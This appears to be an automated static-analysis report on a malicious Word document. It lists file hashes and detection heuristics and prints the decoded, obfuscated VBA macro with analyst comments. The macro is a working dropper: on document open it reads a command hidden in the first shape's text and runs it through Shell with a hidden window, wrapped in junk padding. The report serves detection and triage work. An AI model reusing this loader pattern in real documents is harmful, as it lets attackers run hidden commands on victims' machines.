Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d98fbb3ba2795c9b…

MALICIOUS

Office (OLE)

77.1 KB · Created: 2018-11-12 23:04:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: 2bd3bcf14d9636bbebc0148060c9443b SHA-1: 39711fb26fba069983c6a169f50966cb12547c20 SHA-256: d98fbb3ba2795c9b6805e6ff8928851fa91ce1f2d8fcfabe8a2a7d90c8bd1be1
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6748162-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6748162-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        End If
    RGiSWLCptb = Shell(fYGujmmm + PlLZi + jMzijS, XTYHBmBLs)
       If (vUlXvLk <> 0 Or zLNFMZBGd) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_open()
       If (DwLiE <> 0 Or GEiEVVdtj) Then
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5602 bytes
SHA-256: d8184a16c68aded203eae011e9a21a152c5e2d9dff3746a928a8e9f6d0987d4a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
67 of 106 identifiers look randomly generated (e.g. 'RGiSWLCptb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CNkbZTB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes as exported by olevba. VB_Base = "1Normal.ThisDocument",
' VB_PredeclaredId = True and VB_TemplateDerived = True together look like the
' markers of a Word ThisDocument document module (NOTE(review): inferred from
' the attribute values only). That matters for triage because it is the module
' in which the Document_open handler below is wired to run automatically when
' the file is opened with macros enabled (see the OLE_VBA_DOCOPEN finding).
' Helper invoked from Document_open; this is where the execution happens.
' Nearly all of the body is padding: every "If (<name> <> 0 Or <flag>) Then"
' block tests names that are never assigned anywhere in the visible source.
' There is no Option Explicit, so they are implicit Variants that start as
' Empty; Empty compares equal to 0 and is False in an Or, so those bodies are
' never entered and the strings they would build are never read (expected to
' be dead code inserted to defeat signature matching — NOTE(review): inferred
' from the visible source; an extraction gap could hide an assignment).
' Only three statements matter for triage: the Const immediately below, the
' Shapes(1) read, and the Shell call.
Function chRGZo()
' 159602494 - 159602494 evaluates to 0. It is used later as the windowstyle
' argument of Shell; 0 is vbHide, i.e. the spawned process gets no visible
' window.
Const XTYHBmBLs = 159602494 - 159602494
   If (IBzNwXcvX <> 0 Or qzJAaoz) Then   ' padding: never executes (see above)
        qzJAaoz = True
        WRcwfwHmG = WRcwfwHmG & Atn(IBzNwXcvX)
        If (IBzNwXcvX = 1) Then
            WRcwfwHmG = WRcwfwHmG & "GsKDidTwj"
        Else
            WRcwfwHmG = WRcwfwHmG & "vRlWuKzv"
        End If
    End If
   If (qrHbmTUMW <> 0 Or FLRdo) Then
        FLRdo = True
        LnTfhdI = LnTfhdI & CDbl(qrHbmTUMW)
        If (qrHbmTUMW = 1) Then
            LnTfhdI = LnTfhdI & "wFjGBU"
        Else
            LnTfhdI = LnTfhdI & "LuHIPljRK"
        End If
    End If
' The command string is NOT in the macro source: it is read at runtime from the
' text of the document's first shape. This is why macros.bas alone does not
' show the payload (and why the extracted file has no ClamAV hit while the
' parent document does). To recover it, dump the text of Shapes(1) from the
' document body. The report's SC_STR_POWERSHELL finding suggests it is a
' PowerShell command line, but this listing does not show the shape text.
fYGujmmm = Shapes(1).TextFrame.TextRange.Text
   If (dikzHhP <> 0 Or McMRMiwij) Then
        McMRMiwij = True
        NLBFtQJV = NLBFtQJV & CDbl(dikzHhP)
        If (dikzHhP = 1) Then
            NLBFtQJV = NLBFtQJV & "tcVIWaD"
        Else
            NLBFtQJV = NLBFtQJV & "bMFYZlV"
        End If
    End If
   If (YLbWJhZv <> 0 Or TmQjjbcT) Then
        TmQjjbcT = True
        nBIHs = nBIHs & CByte(YLbWJhZv)
        If (YLbWJhZv = 1) Then
            nBIHs = nBIHs & "DzApjio"
        Else
            nBIHs = nBIHs & "fmOzj"
        End If
    End If
   If (KfjwCZ <> 0 Or iPdGvBpvZ) Then
        iPdGvBpvZ = True
        TASLjj = TASLjj & Atn(KfjwCZ)
        If (KfjwCZ = 1) Then
            TASLjj = TASLjj & "LfdlzV"
        Else
            TASLjj = TASLjj & "vhwdWYK"
        End If
    End If
   If (iqvjpFkX <> 0 Or vYYpTqlHW) Then
        vYYpTqlHW = True
        qUpqIDU = qUpqIDU & Atn(iqvjpFkX)
        If (iqvjpFkX = 1) Then
            qUpqIDU = qUpqIDU & "bOoZjT"
        Else
            qUpqIDU = qUpqIDU & "iTZtEX"
        End If
    End If
   If (affGmsPm <> 0 Or PzuPsz) Then
        PzuPsz = True
        cUnJIHWr = cUnJIHWr & Atn(affGmsPm)
        If (affGmsPm = 1) Then
            cUnJIHWr = cUnJIHWr & "ilWMO"
        Else
            cUnJIHWr = cUnJIHWr & "wFjOLd"
        End If
    End If
' Execution: runs the shape text as a command with a hidden window (windowstyle
' XTYHBmBLs = 0). PlLZi and jMzijS are never assigned in the visible source, so
' as Empty Variants they appear to add nothing to the concatenation. The Shell
' return value (process id) is stored in RGiSWLCptb and never used. For
' detection this is the line to key on: WINWORD.EXE spawning a child process,
' with the command text living in document content rather than in the VBA.
RGiSWLCptb = Shell(fYGujmmm + PlLZi + jMzijS, XTYHBmBLs)
   If (vUlXvLk <> 0 Or zLNFMZBGd) Then
        zLNFMZBGd = True
        MwvYpcsIC = MwvYpcsIC & Atn(vUlXvLk)
        If (vUlXvLk = 1) Then
            MwvYpcsIC = MwvYpcsIC & "XAPPvzaE"
        Else
            MwvYpcsIC = MwvYpcsIC & "SFuirLN"
        End If
    End If
   If (nSliUL <> 0 Or WXvJOJ) Then
        WXvJOJ = True
        onniKCBS = onniKCBS & CInt(nSliUL)
        If (nSliUL = 1) Then
            onniKCBS = onniKCBS & "PapAOpRw"
        Else
            onniKCBS = onniKCBS & "XQXajmjBK"
        End If
    End If
   If (DjLWKuUE <> 0 Or tWPUiVEi) Then
        tWPUiVEi = True
        DjFzNq = DjFzNq & CByte(DjLWKuUE)
        If (DjLWKuUE = 1) Then
            DjFzNq = DjFzNq & "RNHAuIsQi"
        Else
            DjFzNq = DjFzNq & "jPTqUUNJ"
        End If
    End If
   If (IJLqAhGE <> 0 Or XiIinJzW) Then
        XiIinJzW = True
        wwJMzzhLt = wwJMzzhLt & CDbl(IJLqAhGE)
        If (IJLqAhGE = 1) Then
            wwJMzzhLt = wwJMzzhLt & "RENbHL"
        Else
            wwJMzzhLt = wwJMzzhLt & "tZjziIrQD"
        End If
    End If
End Function
' Auto-execution handler: Word runs this when the document is opened with
' macros enabled (the OLE_VBA_DOCOPEN finding). Every If block here is the
' same never-entered padding as in chRGZo — the tested names are never
' assigned in the visible source, so as Empty Variants the conditions are
' False. The only effective statement is the bare call to chRGZo in the
' middle of the body, which reads the shape text and performs the Shell call.
Private Sub Document_open()
   If (DwLiE <> 0 Or GEiEVVdtj) Then   ' padding: never executes (see above)
        GEiEVVdtj = True
        Dskdzq = Dskdzq & CByte(DwLiE)
        If (DwLiE = 1) Then
            Dskdzq = Dskdzq & "ppLVjLsqK"
        Else
            Dskdzq = Dskdzq & "tNQwSpTm"
        End If
    End If
   If (sAOaZz <> 0 Or PSHRzOGSX) Then
        PSHRzOGSX = True
        YOBfMTnrz = YOBfMTnrz & CDbl(sAOaZz)
        If (sAOaZz = 1) Then
            YOBfMTnrz = YOBfMTnrz & "wboGpSO"
        Else
            YOBfMTnrz = YOBfMTnrz & "iBrLFScVm"
        End If
    End If
   If (hPGZOKJ <> 0 Or lfhbicaCo) Then
        lfhbicaCo = True
        AchzOnV = AchzOnV & CByte(hPGZOKJ)
        If (hPGZOKJ = 1) Then
            AchzOnV = AchzOnV & "MJjDrhpNQ"
        Else
            AchzOnV = AchzOnV & "qBavf"
        End If
    End If
   If (fKupznHJR <> 0 Or XANBVs) Then
        XANBVs = True
        UXtpOKfjf = UXtpOKfjf & Atn(fKupznHJR)
        If (fKupznHJR = 1) Then
            UXtpOKfjf = UXtpOKfjf & "RlCRro"
        Else
            UXtpOKfjf = UXtpOKfjf & "OivWYwEjY"
        End If
    End If
' Sole effective statement: hand off to chRGZo (Shapes(1) text -> Shell).
chRGZo
   If (zZIiiQ <> 0 Or rlVzhBSD) Then
        rlVzhBSD = True
        wAGioz = wAGioz & CInt(zZIiiQ)
        If (zZIiiQ = 1) Then
            wAGioz = wAGioz & "VMTLmDFw"
        Else
            wAGioz = wAGioz & "XCqvp"
        End If
    End If
   If (SpDRFcOo <> 0 Or tHRicisH) Then
        tHRicisH = True
        HTOMK = HTOMK & Atn(SpDRFcOo)
        If (SpDRFcOo = 1) Then
            HTOMK = HTOMK & "vWZGwq"
        Else
            HTOMK = HTOMK & "dJhbitWh"
        End If
    End If
   If (QOuYHKjUj <> 0 Or YNCZF) Then
        YNCZF = True
        oVjDIrw = oVjDIrw & CByte(QOuYHKjUj)
        If (QOuYHKjUj = 1) Then
            oVjDIrw = oVjDIrw & "iHABvw"
        Else
            oVjDIrw = oVjDIrw & "UNWwwPqo"
        End If
    End If
   If (SPzvUPj <> 0 Or XwJzf) Then
        XwJzf = True
        uXznnWL = uXznnWL & CByte(SPzvUPj)
        If (SPzvUPj = 1) Then
            uXznnWL = uXznnWL & "CojYt"
        Else
            uXznnWL = uXznnWL & "zbHaU"
        End If
    End If
End Sub